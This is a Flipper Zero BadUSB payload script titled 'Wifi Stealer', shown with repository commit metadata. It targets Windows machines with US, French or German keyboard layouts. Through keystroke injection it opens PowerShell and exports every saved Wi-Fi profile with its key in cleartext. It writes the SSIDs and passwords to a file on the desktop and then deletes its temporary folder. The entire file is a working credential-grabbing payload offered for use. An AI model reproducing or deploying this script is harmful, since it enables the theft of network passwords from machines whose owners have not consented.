Flipper/BadUSB/Wifi-Stealer_ORG.txt
7h30th3r0n3 38cd85f274
Update Wifi-Stealer_ORG.txt
the payload reworked by the0bone which allows to include users with onedrive activated, and allows it to work on German keyboards
2022-09-19 16:03:58 +02:00

20 lines
878 B
Plaintext

REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
REM Reworked: the0bone
REM Target: Windows 7/8/10/11
REM Supported Layout keyboard: US/FR/DE
REM Version: 1.2
REM Category: Grabber
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 2000
REM setting variable
STRING $desktop = ([Environment]::GetFolderPath("Desktop"))
ENTER
REM Creating a new folder in Temp with random name to store the xml files and create single text file.
STRING New-Item -Path $env:temp -Name "js2k3kd4nne5dhsk" -ItemType "directory"; Set-Location -Path "$env:temp/js2k3kd4nne5dhsk"; netsh wlan export profile key=clear; Select-String -Path *.xml -Pattern 'keyMaterial'> $desktop\0.txt; Set-Location -Path "$env:temp"; Remove-Item -Path "$env:tmp/js2k3kd4nne5dhsk" -Force -Recurse; exit
ENTER